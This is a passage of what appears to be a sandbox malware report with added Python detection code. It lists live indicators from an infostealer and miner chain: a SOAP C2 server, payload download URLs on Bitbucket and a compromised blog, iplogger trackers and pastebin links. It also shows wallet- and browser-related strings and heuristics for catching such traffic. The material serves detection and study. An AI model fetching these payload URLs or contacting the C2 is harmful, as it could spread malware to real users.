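    entries, offset = [], 0
    while buf[offset:offset + 4] == LOCAL_SIG:
        entry, data_start = parse_local_header(buf, offset)
        if entry["data_descriptor"]:
            break
        entries.append(entry)
        offset = data_start + entry["compressed_size"]
        if offset > len(buf):
            entry["truncated"] = True  # capture ended inside this member's data
            break
    return entries


def build_sample_zip():
    """Constructed stand-in for cpu.zip: same member names, harmless contents."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("config.json", '{"pools": [{"url": "example.invalid:3333"}]}')  # hypothetical
        zf.writestr("cpu.exe", b"MZ" + b"\x00" * 64)  # placeholder, not a real PE
    return buf.getvalue()


if __name__ == "__main__":
    for blob in (CAPTURED_CONFIG_HEADER, CAPTURED_CPU_HEADER):
        e, _ = parse_local_header(blob)
        print(e["name"], e["method"], e["compressed_size"], e["uncompressed_size"], e["mtime"])
    print([x["name"] for x in walk_local_headers(build_sample_zip())])
```

Local headers are convenient for triage of a truncated download, but a hostile archive can make them disagree with the central directory, which is what extractors actually use; for a complete file, list members with the central directory (zipfile does) and treat local headers as a cross-check.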
                  Source: unknownDNS traffic detected: queries for: iplogger.org
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"Host: 87.251.71.75:3214Content-Length: 136Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
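Two of the network signatures in this section are worth reproducing as detection logic: the repeated connections to 195.2.84.91 that no DNS lookup preceded (a hard-coded payload host), and the SOAP POST to 87.251.71.75:3214, plain HTTP on a non-standard port, with a SOAPAction under tempuri.org, the default namespace of an unconfigured WCF/ASMX service, naming the IRemotePanel contract that also appears in the strings below. The following is an added example written for this page, not sandbox output and not code from the sample: it runs both checks over a constructed event list modelled on the rows above. The event format, the port allow-list and the wording of the reasons are assumptions, not anything the report specifies.

```python
import ipaddress

# Constructed event list modelled on the report's rows (not sandbox output).
EVENTS = [
    {"kind": "dns", "qname": "iplogger.org", "answers": ["88.99.66.31"]},
    {"kind": "tcp", "dst": "88.99.66.31", "dport": 443},
    {"kind": "tcp", "dst": "195.2.84.91", "dport": 80},
    {"kind": "http", "dst": "195.2.84.91", "dport": 80,
     "request": "GET /cpu.zip HTTP/1.1\r\nHost: 195.2.84.91\r\nConnection: Keep-Alive\r\n\r\n"},
    {"kind": "tcp", "dst": "87.251.71.75", "dport": 3214},
    {"kind": "http", "dst": "87.251.71.75", "dport": 3214,
     "request": ("POST / HTTP/1.1\r\nContent-Type: text/xml; charset=utf-8\r\n"
                 'SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"\r\n'
                 "Host: 87.251.71.75:3214\r\nContent-Length: 136\r\n\r\n")},
]

# Ports on which plain HTTP is unremarkable in this environment (an assumption).
EXPECTED_HTTP_PORTS = {80, 443, 8080, 8443}


def ips_without_dns(events):
    """Destination IPs contacted before any DNS answer returned them.

    Order matters: a connect that precedes the answer is still flagged, which is
    what the sandbox's 'without corresponding DNS query' signature expresses."""
    resolved, flagged = set(), []
    for ev in events:
        if ev["kind"] == "dns":
            resolved.update(ev["answers"])
        elif ev["kind"] == "tcp" and ev["dst"] not in resolved and ev["dst"] not in flagged:
            flagged.append(ev["dst"])
    return flagged


def parse_request(raw):
    """Split a raw HTTP request head into (method, target, headers).

    Header names are lower-cased; the body, if any, is ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def host_without_port(host_header):
    """Strip ':port' from a Host header, keeping bracketed IPv6 literals intact."""
    if host_header.startswith("["):
        return host_header[1:host_header.index("]")]
    return host_header.rsplit(":", 1)[0]


def suspicious_request_reasons(headers, dport):
    """Heuristics matching the traits of the report's C2 and payload requests."""
    reasons = []
    host = host_without_port(headers.get("host", ""))
    try:
        ipaddress.ip_address(host)
        reasons.append("host header is an IP literal")
    except ValueError:
        pass
    if dport not in EXPECTED_HTTP_PORTS:
        reasons.append("plain HTTP on non-standard port %d" % dport)
    action = headers.get("soapaction", "").strip('"')
    if action:
        reasons.append("SOAP call %s" % action)
        if "tempuri.org" in action:
            reasons.append("default tempuri.org namespace (unconfigured WCF/ASMX service)")
    return reasons


def triage(events):
    """Combine both checks; returns flagged IPs and per-request reasons."""
    findings = {"no_dns": ips_without_dns(events), "http": []}
    for ev in events:
        if ev["kind"] != "http":
            continue
        method, target, headers = parse_request(ev["request"])
        reasons = suspicious_request_reasons(headers, ev["dport"])
        if reasons:
            findings["http"].append((ev["dst"], ev["dport"], method, target, reasons))
    return findings


if __name__ == "__main__":
    for key, value in triage(EVENTS).items():
        print(key, value)
```

Neither check is conclusive on its own (CDNs and hard-coded update servers also show up as IP-literal hosts), but a process that satisfies both, contacts the hard-coded host first and then speaks tempuri.org SOAP on an odd port, is the pattern the report's signatures are built around.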
                  Source: lxoqz3o0.exe, lxoqz3o0.exe, 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmpString found in binary or memory: http://195.2.84.91/amd.zip
                  Source: lxoqz3o0.exe, lxoqz3o0.exe, 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmpString found in binary or memory: http://195.2.84.91/cpu.zip
                  Source: lxoqz3o0.exe, lxoqz3o0.exe, 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmpString found in binary or memory: http://195.2.84.91/nvidia.zip
                  Source: nulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmpString found in binary or memory: http://87.251.71.75:
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://87.251.71.75:3214
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://87.251.71.75:3214/
                  Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpString found in binary or memory: http://87.251.71.75:32144
                  Source: nulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmpString found in binary or memory: http://87.251.71.75:3214t
                  Source: nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpString found in binary or memory: http://bbuseruploads.s3.amazonaws.com
                  Source: nulhfhsi.exe, 00000004.00000002.470173902.00000000038E5000.00000004.00000001.sdmpString found in binary or memory: http://bitbucket.org
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273445226.00000000032D7000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470069554.00000000038C0000.00000004.00000001.sdmpString found in binary or memory: http://blog.agencia10x.com
                  Source: nulhfhsi.exe, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://bot.whatismyipaddress.com/
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                  Source: nulhfhsi.exe, 00000004.00000002.460631971.0000000001706000.00000004.00000020.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertBaltimoreCA-2G2.crt0
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                  Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                  Source: nulhfhsi.exe, 00000004.00000002.609394498.00000000092C0000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
                  Source: nulhfhsi.exeString found in binary or memory: http://checkip.dyndns.org
                  Source: WinRing0x64.sys.6.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                  Source: WinRing0x64.sys.6.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
                  Source: WinRing0x64.sys.6.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                  Source: WinRing0x64.sys.6.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                  Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                  Source: nulhfhsi.exe, 00000004.00000002.460631971.0000000001706000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertBaltimoreCA-2G2.crl0:
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                  Source: nulhfhsi.exe, 00000004.00000002.460631971.0000000001706000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273445226.00000000032D7000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470069554.00000000038C0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                  Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exeString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
                  Source: nulhfhsi.exe, 00000004.00000002.609394498.00000000092C0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
                  Source: nulhfhsi.exe, 00000004.00000002.460631971.0000000001706000.00000004.00000020.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertBaltimoreCA-2G2.crl0K
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                  Source: nulhfhsi.exe, 00000004.00000002.609394498.00000000092C0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                  Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exeString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
                  Source: nulhfhsi.exe, 00000004.00000002.609394498.00000000092C0000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                  Source: evs.exe, evs.exe, 00000016.00000000.419601888.000000000040A000.00000008.00020000.sdmp, evs.exe.4.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
                  Source: nulhfhsi.exe, 00000004.00000002.470069554.00000000038C0000.00000004.00000001.sdmp, evs.exe, 00000016.00000000.419601888.000000000040A000.00000008.00020000.sdmp, evs.exe.4.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273445226.00000000032D7000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470069554.00000000038C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                  Source: nulhfhsi.exe, 00000004.00000002.460631971.0000000001706000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://ocsp.digicert.com0H
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://ocsp.digicert.com0I
                  Source: nulhfhsi.exe, 00000004.00000002.609394498.00000000092C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0K
                  Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exeString found in binary or memory: http://ocsp.digicert.com0P
                  Source: nulhfhsi.exe, 00000004.00000002.609394498.00000000092C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0R
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                  Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exeString found in binary or memory: http://ocsp.thawte.com0
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://s.symcd.com06
                  Source: nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpString found in binary or memory: http://s3-1-w.amazonaws.com
                  Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org
                  Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                  Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/CONTEXT.Models.Enums
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/0
                  Source: nulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/Complete
                  Source: nulhfhsi.exe, 00000004.00000002.470648936.00000000039CD000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.468811238.0000000003805000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTask
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/CompleteTaskResponse
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/GetSettings
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/GetSettingsResponse
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/GetTasks
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/GetTasksResponse
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.471019323.0000000003A19000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfo
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/IRemotePanel/SendClientInfoResponse
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                  Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                  Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                  Source: nulhfhsi.exe, 00000004.00000002.470510762.00000000039A9000.00000004.00000001.sdmp, 8TD8GfTtaW.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                  Source: nulhfhsi.exe, 00000004.00000002.460631971.0000000001706000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                  Source: 8TD8GfTtaW.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                  Source: nulhfhsi.exeString found in binary or memory: http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoip
                  Source: nulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmpString found in binary or memory: http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoipsecuritywaves-exchange
                  Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: nulhfhsi.exe, 00000004.00000002.467743412.0000000003751000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb
                  Source: nulhfhsi.exe, nulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpString found in binary or memory: https://aui-cdn.atlassian.com
                  Source: nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
                  Source: nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/e9515cd4-e4be-
                  Source: nulhfhsi.exe, 00000004.00000002.470173902.00000000038E5000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org
                  Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470173902.00000000038E5000.00000004.00000001.sdmpString found in binary or memory: https://bitbucket.org/mminminminmin05/testtest/downloads/flesh.exe
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273445226.00000000032D7000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpString found in binary or memory: https://blog.agencia10x.com
                  Source: nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmpString found in binary or memory: https://blog.agencia10x.com/Done.exe
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, 8TD8GfTtaW.exe, 00000000.00000002.273251560.0000000003200000.00000004.00000001.sdmpString found in binary or memory: https://blog.agencia10x.com/dance.exe
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, 8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmpString found in binary or memory: https://blog.agencia10x.com/mex.exe
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmpString found in binary or memory: https://blog.agencia10x.com4
                  Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: 8TD8GfTtaW.exeString found in binary or memory: https://d.symcb.com/cps0%
                  Source: 8TD8GfTtaW.exeString found in binary or memory: https://d.symcb.com/rpa0
                  Source: 8TD8GfTtaW.exeString found in binary or memory: https://d.symcb.com/rpa0.
                  Source: nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpString found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
                  Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabt
                  Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: nulhfhsi.exeString found in binary or memory: https://icanhazip.com
                  Source: nulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmpString found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy
                  Source: nulhfhsi.exe, nulhfhsi.exe, 00000004.00000002.443721950.00000000003B2000.00000040.00020000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org
                  Source: powershell.exe, 00000020.00000002.502282965.0000000000B40000.00000004.00000020.sdmpString found in binary or memory: https://iplogger.org/1n6Zw7
                  Source: powershell.exe, 00000020.00000002.507518014.0000000000DD0000.00000004.00000040.sdmpString found in binary or memory: https://iplogger.org/1n6Zw7C:o9P
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmp, 8TD8GfTtaW.exe, 00000000.00000002.268341781.0000000001392000.00000020.00020000.sdmpString found in binary or memory: https://iplogger.org/1r2et7
                  Source: lxoqz3o0.exe, lxoqz3o0.exe, 00000006.00000003.270094452.0000000000BE0000.00000004.00000001.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000E.00000002.501705858.0000000001132000.00000020.00020000.sdmpString found in binary or memory: https://iplogger.org/1tsef7
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/WmBNYXYN
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273099418.00000000031C1000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/bnxCb5RP
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.268341781.0000000001392000.00000020.00020000.sdmpString found in binary or memory: https://pastebin.com/raw/bnxCb5RPChttps://pastebin.com/raw/WmBNYXYN&
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273278567.0000000003208000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com4
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273321080.000000000326A000.00000004.00000001.sdmp, 8TD8GfTtaW.exe, 00000000.00000002.273251560.0000000003200000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.468885799.000000000380D000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                  Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273424005.00000000032B2000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                  Source: nulhfhsi.exe, 00000004.00000002.470007961.00000000038BB000.00000004.00000001.sdmp, nulhfhsi.exe, 00000004.00000002.470253286.00000000038F2000.00000004.00000001.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website;
                  Source: nulhfhsi.exeString found in binary or memory: https://wtfismyip.com/text
                  Source: 8TD8GfTtaW.exeString found in binary or memory: https://www.digicert.com/CPS0
                  Source: nulhfhsi.exe, 00000004.00000002.471282250.0000000003A52000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 <-> client ports 49720, 49721, 49723, 49729, 49739, 49740, 49741, 49744, 49745, 49746 (each seen in both directions)
                  Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.5:49721 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.67.51:443 -> 192.168.2.5:49723 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49729 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.213.210:443 -> 192.168.2.5:49739 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:49740 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 52.217.107.52:443 -> 192.168.2.5:49741 version: TLS 1.2
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeCode function: 22_2_00405252 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
                  Source: jo.exe, 0000001F.00000002.505910725.0000000000AAA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeWindow created: window name: CLIPBRDWNDCLASS (6 windows)

                  System Summary:

                  PE file contains section with special chars
                  Source: 8TD8GfTtaW.exeStatic PE information: section name:
                  Source: 8TD8GfTtaW.exeStatic PE information: section name:
                  Source: 8TD8GfTtaW.exeStatic PE information: section name:
                  Source: nulhfhsi.exe.0.drStatic PE information: section name:
                  Source: nulhfhsi.exe.0.drStatic PE information: section name:
                  Source: nulhfhsi.exe.0.drStatic PE information: section name:
                  Source: lxoqz3o0.exe.0.drStatic PE information: section name:
                  Source: lxoqz3o0.exe.0.drStatic PE information: section name:
                  Source: lxoqz3o0.exe.0.drStatic PE information: section name:
                  Source: RantimeBroker.exe.6.drStatic PE information: section name:
